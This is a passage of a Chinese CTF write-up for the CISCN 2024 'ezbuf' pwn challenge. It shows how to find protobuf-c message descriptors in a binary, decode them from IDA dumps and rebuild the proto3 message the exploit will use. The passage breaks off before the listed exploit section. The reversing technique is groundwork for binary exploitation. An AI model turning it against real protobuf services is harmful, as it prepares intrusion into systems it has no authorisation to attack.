文章目录
- 参考
- protobuf
- 逆向学习
- 复原结构
- 思路
- exp
参考
https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf
protobuf
当时压根不知道用了protobuf这个玩意,提取工具也没提取出来,还是做题做太少了,很多关键性的结构都没看出来是protobuf
下次可以根据ProtobufCMessageDescriptor结构体开头的magic字段(PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC = 0x28AAEEF9)来搜索定位到ProtobufCMessageDescriptor。注意该值按小端序存放,在IDA的字节视图里看到的是 F9 EE AA 28(见下文BC60处);枚举/服务描述符各自有不同的magic,搜索时不要混淆。另一条线索是字符串交叉引用:protoc-c生成的代码会把message名和字段名作为字符串放进.rodata,而.data.rel.ro里一串引用这些字符串的只读表就是描述符。
逆向学习
/*
 * Message descriptor as emitted by protoc-c (positional initializer; the
 * field order is exactly that of struct ProtobufCMessageDescriptor below,
 * which is what lets it be matched byte-for-byte against the IDA dump).
 * This is the generator's template for a message called "devicemsg"; in the
 * challenge binary the message is actually named "heybro".
 */
const ProtobufCMessageDescriptor devicemsg__descriptor =
{
PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,   /* magic: 0x28aaeef9, the search anchor */
"devicemsg",                            /* name: qualified name */
"Devicemsg",                            /* short_name: name as written in the .proto */
"Devicemsg",                            /* c_name: name of the generated C struct */
"",                                     /* package_name: empty, no package declared */
sizeof(Devicemsg),                      /* sizeof_message: 0x48 for heybro in the binary */
5,                                      /* n_fields */
devicemsg__field_descriptors,           /* fields: array of n_fields ProtobufCFieldDescriptor */
devicemsg__field_indices_by_name,       /* fields_sorted_by_name */
1, devicemsg__number_ranges,            /* n_field_ranges, field_ranges */
(ProtobufCMessageInit) devicemsg__init, /* message_init (sub_1AFE in the binary) */
NULL,NULL,NULL /* reserved[123] */
};
相关字段
/**
 * Describes a message.
 *
 * Layout notes (x86-64, 8-byte pointers) so the struct can be matched
 * against a raw .data.rel.ro dump: magic is 4 bytes plus 4 bytes of
 * padding, so the first pointer lives at +0x08; the 4-byte counters
 * n_fields and n_field_ranges are likewise padded out to 8 bytes. The
 * offsets below line up with the heybro descriptor dump that follows.
 */
struct ProtobufCMessageDescriptor {
    /** Magic value checked to ensure that the API is used correctly.
     *  +0x00. PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC (0x28aaeef9) for every
     *  message descriptor, which is what makes it a good search pattern. */
    uint32_t magic;
    /** The qualified name (e.g., "namespace.Type"). +0x08 */
    const char *name;
    /** The unqualified name as given in the .proto file (e.g., "Type"). +0x10 */
    const char *short_name;
    /** Identifier used in generated C code. +0x18 */
    const char *c_name;
    /** The dot-separated namespace. +0x20 (an empty string when no package is declared) */
    const char *package_name;
    /**
     * Size in bytes of the C structure representing an instance of this
     * type of message. +0x28 (0x48 for heybro)
     */
    size_t sizeof_message;
    /** Number of elements in `fields`. +0x30 (5 for heybro) */
    unsigned n_fields;
    /** Field descriptors, sorted by tag number. +0x38 */
    const ProtobufCFieldDescriptor *fields;
    /** Used for looking up fields by name. +0x40 */
    const unsigned *fields_sorted_by_name;
    /** Number of elements in `field_ranges`. +0x48 */
    unsigned n_field_ranges;
    /** Used for looking up fields by id. +0x50 */
    const ProtobufCIntRange *field_ranges;
    /** Message initialisation function. +0x58 (sub_1AFE in the binary) */
    ProtobufCMessageInit message_init;
    /** Reserved for future use. +0x60 */
    void *reserved1;
    /** Reserved for future use. +0x68 */
    void *reserved2;
    /** Reserved for future use. +0x70 */
    void *reserved3;
};
对应IDA中(按结构体逐字段解码:BC60 magic=0x28AAEEF9,小端存放为 F9 EE AA 28;BC68 name="heybro";BC70 short_name="Heybro";BC78 c_name="Heybro";BC80 package_name=unk_910E,应为空串;BC88 sizeof_message=0x48;BC90 n_fields=5;BC98 fields→off_BAE0,即字段描述符数组;BCA0 fields_sorted_by_name;BCA8 n_field_ranges=1;BCB0 field_ranges;BCB8 message_init=sub_1AFE):
.data.rel.ro:000000000000BC60 unk_BC60 db 0F9h ; DATA XREF: sub_1AFE+5B↑o
.data.rel.ro:000000000000BC60 ; sub_1B66+17↑o ...
.data.rel.ro:000000000000BC61 db 0EEh
.data.rel.ro:000000000000BC62 db 0AAh
.data.rel.ro:000000000000BC63 db 28h ; (
.data.rel.ro:000000000000BC64 db 0
.data.rel.ro:000000000000BC65 db 0
.data.rel.ro:000000000000BC66 db 0
.data.rel.ro:000000000000BC67 db 0
.data.rel.ro:000000000000BC68 dq offset aHeybro ; "heybro"
.data.rel.ro:000000000000BC70 dq offset aHeybro_0 ; "Heybro"
.data.rel.ro:000000000000BC78 dq offset aHeybro_0 ; "Heybro"
.data.rel.ro:000000000000BC80 dq offset unk_910E
.data.rel.ro:000000000000BC88 db 48h ; H
.data.rel.ro:000000000000BC89 db 0
.data.rel.ro:000000000000BC8A db 0
.data.rel.ro:000000000000BC8B db 0
.data.rel.ro:000000000000BC8C db 0
.data.rel.ro:000000000000BC8D db 0
.data.rel.ro:000000000000BC8E db 0
.data.rel.ro:000000000000BC8F db 0
.data.rel.ro:000000000000BC90 db 5
.data.rel.ro:000000000000BC91 db 0
.data.rel.ro:000000000000BC92 db 0
.data.rel.ro:000000000000BC93 db 0
.data.rel.ro:000000000000BC94 db 0
.data.rel.ro:000000000000BC95 db 0
.data.rel.ro:000000000000BC96 db 0
.data.rel.ro:000000000000BC97 db 0
.data.rel.ro:000000000000BC98 dq offset off_BAE0 ; "whatcon"
.data.rel.ro:000000000000BCA0 dq offset unk_90D0
.data.rel.ro:000000000000BCA8 db 1
.data.rel.ro:000000000000BCA9 db 0
.data.rel.ro:000000000000BCAA db 0
.data.rel.ro:000000000000BCAB db 0
.data.rel.ro:000000000000BCAC db 0
.data.rel.ro:000000000000BCAD db 0
.data.rel.ro:000000000000BCAE db 0
.data.rel.ro:000000000000BCAF db 0
.data.rel.ro:000000000000BCB0 dq offset unk_90F0
.data.rel.ro:000000000000BCB8 dq offset sub_1AFE
然后顺着BC98处的fields指针(off_BAE0)去读ProtobufCFieldDescriptor数组,逐项恢复各个字段的内容;数组共n_fields=5项,每项在x86-64上占0x48字节。
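/*
 * Field table as emitted by protoc-c (template for "devicemsg"; the binary's
 * message is "heybro"). Entries are sorted by tag number and each entry is
 * 0x48 bytes on x86-64, which is why consecutive entries in the IDA dump sit
 * 0x48 apart (0xBAE0, 0xBB28, 0xBB70, 0xBBB8, 0xBC00). The offsetof() values
 * noted per entry are the ones visible in the dump.
 *
 * The original listing had a stray "protobuf_c_message_pack" token glued to
 * the opening brace of the fifth entry; it has been removed so the array is
 * valid C again.
 */
static const ProtobufCFieldDescriptor devicemsg__field_descriptors[5] =
{
    {
        "whatcon",
        1,                              /* tag */
        PROTOBUF_C_LABEL_NONE,          /* 3 */
        PROTOBUF_C_TYPE_BYTES,          /* 0x0F: a ProtobufCBinaryData {len, data} in C */
        0, /* quantifier_offset */
        offsetof(Devicemsg, whatcon),   /* 0x18 in the binary */
        NULL,
        NULL,
        0, /* flags */
        0,NULL,NULL /* reserved1,reserved2, etc */
    },
    {
        "whattodo",
        2,
        PROTOBUF_C_LABEL_NONE,
        PROTOBUF_C_TYPE_SINT64,         /* 4 */
        0, /* quantifier_offset */
        offsetof(Devicemsg, whattodo),  /* 0x28 */
        NULL,
        NULL,
        0, /* flags */
        0,NULL,NULL /* reserved1,reserved2, etc */
    },
    {
        "whatidx",
        3,
        PROTOBUF_C_LABEL_NONE,
        PROTOBUF_C_TYPE_SINT64,         /* 4 */
        0, /* quantifier_offset */
        offsetof(Devicemsg, whatidx),   /* 0x30 */
        NULL,
        NULL,
        0, /* flags */
        0,NULL,NULL /* reserved1,reserved2, etc */
    },
    {
        "whatsize",
        4,
        PROTOBUF_C_LABEL_NONE,
        PROTOBUF_C_TYPE_SINT64,         /* 4 */
        0, /* quantifier_offset */
        offsetof(Devicemsg, whatsize),  /* 0x38 */
        NULL,
        NULL,
        0, /* flags */
        0,NULL,NULL /* reserved1,reserved2, etc */
    },
    {
        "whatsthis",
        5,
        PROTOBUF_C_LABEL_NONE,
        PROTOBUF_C_TYPE_UINT32,         /* 6 */
        0, /* quantifier_offset */
        offsetof(Devicemsg, whatsthis), /* 0x40 */
        NULL,
        NULL,
        0, /* flags */
        0,NULL,NULL /* reserved1,reserved2, etc */
    },
};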
相关字段的定义
/*
 * Describes one field of a message. Offsets are for x86-64; the four-byte
 * members after `name` are packed, then padded so `descriptor` is 8-byte
 * aligned, giving sizeof == 0x48 (the stride seen in the IDA dump).
 */
struct ProtobufCFieldDescriptor {
    /** Name of the field as given in the .proto file. +0x00 */
    const char *name;
    /** Tag value of the field as given in the .proto file. +0x08 */
    uint32_t id;
    /** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. +0x0C
     *  (3 == PROTOBUF_C_LABEL_NONE for every field in the binary) */
    ProtobufCLabel label;
    /** The type of the field. +0x10 (see the ProtobufCType enum below) */
    ProtobufCType type;
    /**
     * The offset in bytes of the message's C structure's quantifier field
     * (the `has_MEMBER` field for optional members or the `n_MEMBER` field
     * for repeated members or the case enum for oneofs). +0x14
     */
    unsigned quantifier_offset;
    /**
     * The offset in bytes into the message's C structure for the member
     * itself. +0x18 (this is what recovers the Heybro struct layout)
     */
    unsigned offset;
    /**
     * A type-specific descriptor. +0x20
     *
     * If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
     * corresponding `ProtobufCEnumDescriptor`.
     *
     * If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
     * the corresponding `ProtobufCMessageDescriptor`.
     *
     * Otherwise this field is NULL.
     */
    const void *descriptor; /* for MESSAGE and ENUM types */
    /** The default value for this field, if defined. May be NULL. +0x28 */
    const void *default_value;
    /**
     * A flag word. Zero or more of the bits defined in the
     * `ProtobufCFieldFlag` enum may be set. +0x30
     */
    uint32_t flags;
    /** Reserved for future use. +0x34 */
    unsigned reserved_flags;
    /** Reserved for future use. +0x38 */
    void *reserved2;
    /** Reserved for future use. +0x40 */
    void *reserved3;
};
根据每个字段描述符的前四个成员 const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type; 就能复原原来的.proto结构;label和type的数值按下面两个枚举对照(枚举值写在每项旁边,方便和dump里的字节比对):
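/*
 * Field label, stored as a 4-byte enum at offset 0x0C of ProtobufCFieldDescriptor.
 * Written as a valid C enum (the listing previously had the numeric value
 * pasted in front of each name, which does not compile). Every field in the
 * challenge binary carries label 3 (PROTOBUF_C_LABEL_NONE), i.e. the message
 * was compiled from a proto3 file.
 */
typedef enum {
    /** A well-formed message must have exactly one of this field. */
    PROTOBUF_C_LABEL_REQUIRED = 0,
    /**
     * A well-formed message can have zero or one of this field (but not
     * more than one).
     */
    PROTOBUF_C_LABEL_OPTIONAL = 1,
    /**
     * This field can be repeated any number of times (including zero) in a
     * well-formed message. The order of the repeated values will be
     * preserved.
     */
    PROTOBUF_C_LABEL_REPEATED = 2,
    /**
     * This field has no label. This is valid only in proto3 and is
     * equivalent to OPTIONAL but no "has" quantifier will be consulted.
     */
    PROTOBUF_C_LABEL_NONE = 3,
} ProtobufCLabel;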
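/*
 * Field type, stored as a 4-byte enum at offset 0x10 of ProtobufCFieldDescriptor.
 * Written as a valid C enum (the listing previously had the numeric value
 * pasted in front of each name). Values seen in the binary: 0x0F (BYTES) for
 * whatcon, 4 (SINT64) for whattodo/whatidx/whatsize, 6 (UINT32) for whatsthis.
 */
typedef enum {
    PROTOBUF_C_TYPE_INT32    = 0,  /**< int32 */
    PROTOBUF_C_TYPE_SINT32   = 1,  /**< signed int32 */
    PROTOBUF_C_TYPE_SFIXED32 = 2,  /**< signed int32 (4 bytes) */
    PROTOBUF_C_TYPE_INT64    = 3,  /**< int64 */
    PROTOBUF_C_TYPE_SINT64   = 4,  /**< signed int64 */
    PROTOBUF_C_TYPE_SFIXED64 = 5,  /**< signed int64 (8 bytes) */
    PROTOBUF_C_TYPE_UINT32   = 6,  /**< unsigned int32 */
    PROTOBUF_C_TYPE_FIXED32  = 7,  /**< unsigned int32 (4 bytes) */
    PROTOBUF_C_TYPE_UINT64   = 8,  /**< unsigned int64 */
    PROTOBUF_C_TYPE_FIXED64  = 9,  /**< unsigned int64 (8 bytes) */
    PROTOBUF_C_TYPE_FLOAT    = 10, /**< float */
    PROTOBUF_C_TYPE_DOUBLE   = 11, /**< double */
    PROTOBUF_C_TYPE_BOOL     = 12, /**< boolean */
    PROTOBUF_C_TYPE_ENUM     = 13, /**< enumerated type */
    PROTOBUF_C_TYPE_STRING   = 14, /**< UTF-8 or ASCII string */
    PROTOBUF_C_TYPE_BYTES    = 15, /**< arbitrary byte sequence (ProtobufCBinaryData in C) */
    PROTOBUF_C_TYPE_MESSAGE  = 16, /**< nested message */
} ProtobufCType;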
对应到IDA中(下面是5个ProtobufCFieldDescriptor的连续dump,每项0x48字节,起始地址分别为BAE0、BB28、BB70、BBB8、BC00;按 name, id, label, type, quantifier_offset, offset 逐项解码:whatcon id=1 label=3 type=0x0F(BYTES) offset=0x18;whattodo id=2 label=3 type=4(SINT64) offset=0x28;whatidx id=3 label=3 type=4 offset=0x30;whatsize id=4 label=3 type=4 offset=0x38;whatsthis id=5 label=3 type=6(UINT32) offset=0x40;其余descriptor/default_value/flags/reserved均为0):
.data.rel.ro:000000000000BAE0 off_BAE0 dq offset aWhatcon ; DATA XREF: .data.rel.ro:000000000000BC98↓o
.data.rel.ro:000000000000BAE0 ; "whatcon"
.data.rel.ro:000000000000BAE8 db 1
.data.rel.ro:000000000000BAE9 db 0
.data.rel.ro:000000000000BAEA db 0
.data.rel.ro:000000000000BAEB db 0
.data.rel.ro:000000000000BAEC db 3
.data.rel.ro:000000000000BAED db 0
.data.rel.ro:000000000000BAEE db 0
.data.rel.ro:000000000000BAEF db 0
.data.rel.ro:000000000000BAF0 db 0Fh
.data.rel.ro:000000000000BAF1 db 0
.data.rel.ro:000000000000BAF2 db 0
.data.rel.ro:000000000000BAF3 db 0
.data.rel.ro:000000000000BAF4 db 0
.data.rel.ro:000000000000BAF5 db 0
.data.rel.ro:000000000000BAF6 db 0
.data.rel.ro:000000000000BAF7 db 0
.data.rel.ro:000000000000BAF8 db 18h
.data.rel.ro:000000000000BAF9 db 0
.data.rel.ro:000000000000BAFA db 0
.data.rel.ro:000000000000BAFB db 0
.data.rel.ro:000000000000BAFC db 0
.data.rel.ro:000000000000BAFD db 0
.data.rel.ro:000000000000BAFE db 0
.data.rel.ro:000000000000BAFF db 0
.data.rel.ro:000000000000BB00 db 0
.data.rel.ro:000000000000BB01 db 0
.data.rel.ro:000000000000BB02 db 0
.data.rel.ro:000000000000BB03 db 0
.data.rel.ro:000000000000BB04 db 0
.data.rel.ro:000000000000BB05 db 0
.data.rel.ro:000000000000BB06 db 0
.data.rel.ro:000000000000BB07 db 0
.data.rel.ro:000000000000BB08 db 0
.data.rel.ro:000000000000BB09 db 0
.data.rel.ro:000000000000BB0A db 0
.data.rel.ro:000000000000BB0B db 0
.data.rel.ro:000000000000BB0C db 0
.data.rel.ro:000000000000BB0D db 0
.data.rel.ro:000000000000BB0E db 0
.data.rel.ro:000000000000BB0F db 0
.data.rel.ro:000000000000BB10 db 0
.data.rel.ro:000000000000BB11 db 0
.data.rel.ro:000000000000BB12 db 0
.data.rel.ro:000000000000BB13 db 0
.data.rel.ro:000000000000BB14 db 0
.data.rel.ro:000000000000BB15 db 0
.data.rel.ro:000000000000BB16 db 0
.data.rel.ro:000000000000BB17 db 0
.data.rel.ro:000000000000BB18 db 0
.data.rel.ro:000000000000BB19 db 0
.data.rel.ro:000000000000BB1A db 0
.data.rel.ro:000000000000BB1B db 0
.data.rel.ro:000000000000BB1C db 0
.data.rel.ro:000000000000BB1D db 0
.data.rel.ro:000000000000BB1E db 0
.data.rel.ro:000000000000BB1F db 0
.data.rel.ro:000000000000BB20 db 0
.data.rel.ro:000000000000BB21 db 0
.data.rel.ro:000000000000BB22 db 0
.data.rel.ro:000000000000BB23 db 0
.data.rel.ro:000000000000BB24 db 0
.data.rel.ro:000000000000BB25 db 0
.data.rel.ro:000000000000BB26 db 0
.data.rel.ro:000000000000BB27 db 0
.data.rel.ro:000000000000BB28 dq offset aWhattodo ; "whattodo"
.data.rel.ro:000000000000BB30 db 2
.data.rel.ro:000000000000BB31 db 0
.data.rel.ro:000000000000BB32 db 0
.data.rel.ro:000000000000BB33 db 0
.data.rel.ro:000000000000BB34 db 3
.data.rel.ro:000000000000BB35 db 0
.data.rel.ro:000000000000BB36 db 0
.data.rel.ro:000000000000BB37 db 0
.data.rel.ro:000000000000BB38 db 4
.data.rel.ro:000000000000BB39 db 0
.data.rel.ro:000000000000BB3A db 0
.data.rel.ro:000000000000BB3B db 0
.data.rel.ro:000000000000BB3C db 0
.data.rel.ro:000000000000BB3D db 0
.data.rel.ro:000000000000BB3E db 0
.data.rel.ro:000000000000BB3F db 0
.data.rel.ro:000000000000BB40 db 28h ; (
.data.rel.ro:000000000000BB41 db 0
.data.rel.ro:000000000000BB42 db 0
.data.rel.ro:000000000000BB43 db 0
.data.rel.ro:000000000000BB44 db 0
.data.rel.ro:000000000000BB45 db 0
.data.rel.ro:000000000000BB46 db 0
.data.rel.ro:000000000000BB47 db 0
.data.rel.ro:000000000000BB48 db 0
.data.rel.ro:000000000000BB49 db 0
.data.rel.ro:000000000000BB4A db 0
.data.rel.ro:000000000000BB4B db 0
.data.rel.ro:000000000000BB4C db 0
.data.rel.ro:000000000000BB4D db 0
.data.rel.ro:000000000000BB4E db 0
.data.rel.ro:000000000000BB4F db 0
.data.rel.ro:000000000000BB50 db 0
.data.rel.ro:000000000000BB51 db 0
.data.rel.ro:000000000000BB52 db 0
.data.rel.ro:000000000000BB53 db 0
.data.rel.ro:000000000000BB54 db 0
.data.rel.ro:000000000000BB55 db 0
.data.rel.ro:000000000000BB56 db 0
.data.rel.ro:000000000000BB57 db 0
.data.rel.ro:000000000000BB58 db 0
.data.rel.ro:000000000000BB59 db 0
.data.rel.ro:000000000000BB5A db 0
.data.rel.ro:000000000000BB5B db 0
.data.rel.ro:000000000000BB5C db 0
.data.rel.ro:000000000000BB5D db 0
.data.rel.ro:000000000000BB5E db 0
.data.rel.ro:000000000000BB5F db 0
.data.rel.ro:000000000000BB60 db 0
.data.rel.ro:000000000000BB61 db 0
.data.rel.ro:000000000000BB62 db 0
.data.rel.ro:000000000000BB63 db 0
.data.rel.ro:000000000000BB64 db 0
.data.rel.ro:000000000000BB65 db 0
.data.rel.ro:000000000000BB66 db 0
.data.rel.ro:000000000000BB67 db 0
.data.rel.ro:000000000000BB68 db 0
.data.rel.ro:000000000000BB69 db 0
.data.rel.ro:000000000000BB6A db 0
.data.rel.ro:000000000000BB6B db 0
.data.rel.ro:000000000000BB6C db 0
.data.rel.ro:000000000000BB6D db 0
.data.rel.ro:000000000000BB6E db 0
.data.rel.ro:000000000000BB6F db 0
.data.rel.ro:000000000000BB70 dq offset aWhatidx ; "whatidx"
.data.rel.ro:000000000000BB78 db 3
.data.rel.ro:000000000000BB79 db 0
.data.rel.ro:000000000000BB7A db 0
.data.rel.ro:000000000000BB7B db 0
.data.rel.ro:000000000000BB7C db 3
.data.rel.ro:000000000000BB7D db 0
.data.rel.ro:000000000000BB7E db 0
.data.rel.ro:000000000000BB7F db 0
.data.rel.ro:000000000000BB80 db 4
.data.rel.ro:000000000000BB81 db 0
.data.rel.ro:000000000000BB82 db 0
.data.rel.ro:000000000000BB83 db 0
.data.rel.ro:000000000000BB84 db 0
.data.rel.ro:000000000000BB85 db 0
.data.rel.ro:000000000000BB86 db 0
.data.rel.ro:000000000000BB87 db 0
.data.rel.ro:000000000000BB88 db 30h ; 0
.data.rel.ro:000000000000BB89 db 0
.data.rel.ro:000000000000BB8A db 0
.data.rel.ro:000000000000BB8B db 0
.data.rel.ro:000000000000BB8C db 0
.data.rel.ro:000000000000BB8D db 0
.data.rel.ro:000000000000BB8E db 0
.data.rel.ro:000000000000BB8F db 0
.data.rel.ro:000000000000BB90 db 0
.data.rel.ro:000000000000BB91 db 0
.data.rel.ro:000000000000BB92 db 0
.data.rel.ro:000000000000BB93 db 0
.data.rel.ro:000000000000BB94 db 0
.data.rel.ro:000000000000BB95 db 0
.data.rel.ro:000000000000BB96 db 0
.data.rel.ro:000000000000BB97 db 0
.data.rel.ro:000000000000BB98 db 0
.data.rel.ro:000000000000BB99 db 0
.data.rel.ro:000000000000BB9A db 0
.data.rel.ro:000000000000BB9B db 0
.data.rel.ro:000000000000BB9C db 0
.data.rel.ro:000000000000BB9D db 0
.data.rel.ro:000000000000BB9E db 0
.data.rel.ro:000000000000BB9F db 0
.data.rel.ro:000000000000BBA0 db 0
.data.rel.ro:000000000000BBA1 db 0
.data.rel.ro:000000000000BBA2 db 0
.data.rel.ro:000000000000BBA3 db 0
.data.rel.ro:000000000000BBA4 db 0
.data.rel.ro:000000000000BBA5 db 0
.data.rel.ro:000000000000BBA6 db 0
.data.rel.ro:000000000000BBA7 db 0
.data.rel.ro:000000000000BBA8 db 0
.data.rel.ro:000000000000BBA9 db 0
.data.rel.ro:000000000000BBAA db 0
.data.rel.ro:000000000000BBAB db 0
.data.rel.ro:000000000000BBAC db 0
.data.rel.ro:000000000000BBAD db 0
.data.rel.ro:000000000000BBAE db 0
.data.rel.ro:000000000000BBAF db 0
.data.rel.ro:000000000000BBB0 db 0
.data.rel.ro:000000000000BBB1 db 0
.data.rel.ro:000000000000BBB2 db 0
.data.rel.ro:000000000000BBB3 db 0
.data.rel.ro:000000000000BBB4 db 0
.data.rel.ro:000000000000BBB5 db 0
.data.rel.ro:000000000000BBB6 db 0
.data.rel.ro:000000000000BBB7 db 0
.data.rel.ro:000000000000BBB8 dq offset aWhatsize ; "whatsize"
.data.rel.ro:000000000000BBC0 db 4
.data.rel.ro:000000000000BBC1 db 0
.data.rel.ro:000000000000BBC2 db 0
.data.rel.ro:000000000000BBC3 db 0
.data.rel.ro:000000000000BBC4 db 3
.data.rel.ro:000000000000BBC5 db 0
.data.rel.ro:000000000000BBC6 db 0
.data.rel.ro:000000000000BBC7 db 0
.data.rel.ro:000000000000BBC8 db 4
.data.rel.ro:000000000000BBC9 db 0
.data.rel.ro:000000000000BBCA db 0
.data.rel.ro:000000000000BBCB db 0
.data.rel.ro:000000000000BBCC db 0
.data.rel.ro:000000000000BBCD db 0
.data.rel.ro:000000000000BBCE db 0
.data.rel.ro:000000000000BBCF db 0
.data.rel.ro:000000000000BBD0 db 38h ; 8
.data.rel.ro:000000000000BBD1 db 0
.data.rel.ro:000000000000BBD2 db 0
.data.rel.ro:000000000000BBD3 db 0
.data.rel.ro:000000000000BBD4 db 0
.data.rel.ro:000000000000BBD5 db 0
.data.rel.ro:000000000000BBD6 db 0
.data.rel.ro:000000000000BBD7 db 0
.data.rel.ro:000000000000BBD8 db 0
.data.rel.ro:000000000000BBD9 db 0
.data.rel.ro:000000000000BBDA db 0
.data.rel.ro:000000000000BBDB db 0
.data.rel.ro:000000000000BBDC db 0
.data.rel.ro:000000000000BBDD db 0
.data.rel.ro:000000000000BBDE db 0
.data.rel.ro:000000000000BBDF db 0
.data.rel.ro:000000000000BBE0 db 0
.data.rel.ro:000000000000BBE1 db 0
.data.rel.ro:000000000000BBE2 db 0
.data.rel.ro:000000000000BBE3 db 0
.data.rel.ro:000000000000BBE4 db 0
.data.rel.ro:000000000000BBE5 db 0
.data.rel.ro:000000000000BBE6 db 0
.data.rel.ro:000000000000BBE7 db 0
.data.rel.ro:000000000000BBE8 db 0
.data.rel.ro:000000000000BBE9 db 0
.data.rel.ro:000000000000BBEA db 0
.data.rel.ro:000000000000BBEB db 0
.data.rel.ro:000000000000BBEC db 0
.data.rel.ro:000000000000BBED db 0
.data.rel.ro:000000000000BBEE db 0
.data.rel.ro:000000000000BBEF db 0
.data.rel.ro:000000000000BBF0 db 0
.data.rel.ro:000000000000BBF1 db 0
.data.rel.ro:000000000000BBF2 db 0
.data.rel.ro:000000000000BBF3 db 0
.data.rel.ro:000000000000BBF4 db 0
.data.rel.ro:000000000000BBF5 db 0
.data.rel.ro:000000000000BBF6 db 0
.data.rel.ro:000000000000BBF7 db 0
.data.rel.ro:000000000000BBF8 db 0
.data.rel.ro:000000000000BBF9 db 0
.data.rel.ro:000000000000BBFA db 0
.data.rel.ro:000000000000BBFB db 0
.data.rel.ro:000000000000BBFC db 0
.data.rel.ro:000000000000BBFD db 0
.data.rel.ro:000000000000BBFE db 0
.data.rel.ro:000000000000BBFF db 0
.data.rel.ro:000000000000BC00 dq offset aWhatsthis ; "whatsthis"
.data.rel.ro:000000000000BC08 db 5
.data.rel.ro:000000000000BC09 db 0
.data.rel.ro:000000000000BC0A db 0
.data.rel.ro:000000000000BC0B db 0
.data.rel.ro:000000000000BC0C db 3
.data.rel.ro:000000000000BC0D db 0
.data.rel.ro:000000000000BC0E db 0
.data.rel.ro:000000000000BC0F db 0
.data.rel.ro:000000000000BC10 db 6
.data.rel.ro:000000000000BC11 db 0
.data.rel.ro:000000000000BC12 db 0
.data.rel.ro:000000000000BC13 db 0
.data.rel.ro:000000000000BC14 db 0
.data.rel.ro:000000000000BC15 db 0
.data.rel.ro:000000000000BC16 db 0
.data.rel.ro:000000000000BC17 db 0
.data.rel.ro:000000000000BC18 db 40h ; @
.data.rel.ro:000000000000BC19 db 0
.data.rel.ro:000000000000BC1A db 0
.data.rel.ro:000000000000BC1B db 0
.data.rel.ro:000000000000BC1C db 0
.data.rel.ro:000000000000BC1D db 0
.data.rel.ro:000000000000BC1E db 0
.data.rel.ro:000000000000BC1F db 0
.data.rel.ro:000000000000BC20 db 0
.data.rel.ro:000000000000BC21 db 0
.data.rel.ro:000000000000BC22 db 0
.data.rel.ro:000000000000BC23 db 0
.data.rel.ro:000000000000BC24 db 0
.data.rel.ro:000000000000BC25 db 0
.data.rel.ro:000000000000BC26 db 0
.data.rel.ro:000000000000BC27 db 0
.data.rel.ro:000000000000BC28 db 0
.data.rel.ro:000000000000BC29 db 0
.data.rel.ro:000000000000BC2A db 0
.data.rel.ro:000000000000BC2B db 0
.data.rel.ro:000000000000BC2C db 0
.data.rel.ro:000000000000BC2D db 0
.data.rel.ro:000000000000BC2E db 0
.data.rel.ro:000000000000BC2F db 0
.data.rel.ro:000000000000BC30 db 0
.data.rel.ro:000000000000BC31 db 0
.data.rel.ro:000000000000BC32 db 0
.data.rel.ro:000000000000BC33 db 0
.data.rel.ro:000000000000BC34 db 0
.data.rel.ro:000000000000BC35 db 0
.data.rel.ro:000000000000BC36 db 0
.data.rel.ro:000000000000BC37 db 0
.data.rel.ro:000000000000BC38 db 0
.data.rel.ro:000000000000BC39 db 0
.data.rel.ro:000000000000BC3A db 0
.data.rel.ro:000000000000BC3B db 0
.data.rel.ro:000000000000BC3C db 0
.data.rel.ro:000000000000BC3D db 0
.data.rel.ro:000000000000BC3E db 0
.data.rel.ro:000000000000BC3F db 0
.data.rel.ro:000000000000BC40 db 0
.data.rel.ro:000000000000BC41 db 0
.data.rel.ro:000000000000BC42 db 0
.data.rel.ro:000000000000BC43 db 0
.data.rel.ro:000000000000BC44 db 0
.data.rel.ro:000000000000BC45 db 0
.data.rel.ro:000000000000BC46 db 0
.data.rel.ro:000000000000BC47 db 0
.data.rel.ro:000000000000BC48 db 0
.data.rel.ro:000000000000BC49 db 0
.data.rel.ro:000000000000BC4A db 0
.data.rel.ro:000000000000BC4B db 0
.data.rel.ro:000000000000BC4C db 0
.data.rel.ro:000000000000BC4D db 0
.data.rel.ro:000000000000BC4E db 0
.data.rel.ro:000000000000BC4F db 0
.data.rel.ro:000000000000BC50 db 0
.data.rel.ro:000000000000BC51 db 0
.data.rel.ro:000000000000BC52 db 0
.data.rel.ro:000000000000BC53 db 0
.data.rel.ro:000000000000BC54 db 0
.data.rel.ro:000000000000BC55 db 0
.data.rel.ro:000000000000BC56 db 0
.data.rel.ro:000000000000BC57 db 0
.data.rel.ro:000000000000BC58 db 0
.data.rel.ro:000000000000BC59 db 0
.data.rel.ro:000000000000BC5A db 0
.data.rel.ro:000000000000BC5B db 0
.data.rel.ro:000000000000BC5C db 0
.data.rel.ro:000000000000BC5D db 0
.data.rel.ro:000000000000BC5E db 0
.data.rel.ro:000000000000BC5F db 0
复原结构
根据ProtobufCMessageDescriptor的name字段得到这个message的名字为heybro(上面贴的生成代码里叫devicemsg,那只是protoc-c输出的模板;exp中导入的模块名devicemsg_pb2说明.proto文件应命名为devicemsg.proto,message名则取二进制里的heybro),然后根据每个ProtobufCFieldDescriptor的前四个成员 const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type; 得到各个字段的名字、id、label和类型。所有字段的label都是3(PROTOBUF_C_LABEL_NONE),这只在proto3中合法,所以复原的.proto必须声明 syntax = "proto3";,否则protoc会报字段缺少required/optional/repeated。
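// devicemsg.proto — recovered from the heybro descriptor in the binary.
// The exploit below imports devicemsg_pb2, so the file is named devicemsg.proto
// and compiled with `protoc --python_out=. devicemsg.proto`.
// Every field carries label PROTOBUF_C_LABEL_NONE (3), which only exists in
// proto3, so the syntax line is required: without it protoc defaults to proto2
// and rejects the unlabelled fields.
syntax = "proto3";

message heybro {
  bytes  whatcon   = 1;  // ProtobufCBinaryData {len, data} in the C struct
  sint64 whattodo  = 2;  // menu op as used by the exp: 1 add, 2 delete, 3 show, 4 exit
  sint64 whatidx   = 3;  // slot index
  sint64 whatsize  = 4;
  uint32 whatsthis = 5;
}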
/*
 * C struct protoc-c generates for `message heybro`. sizeof == 0x48, matching
 * sizeof_message in the descriptor dump; the member offsets are exactly the
 * ones read by the sub_1934 call below.
 */
struct Heybro
{
    ProtobufCMessage base;       // +0x00, 24 bytes: descriptor, n_unknown_fields, unknown_fields
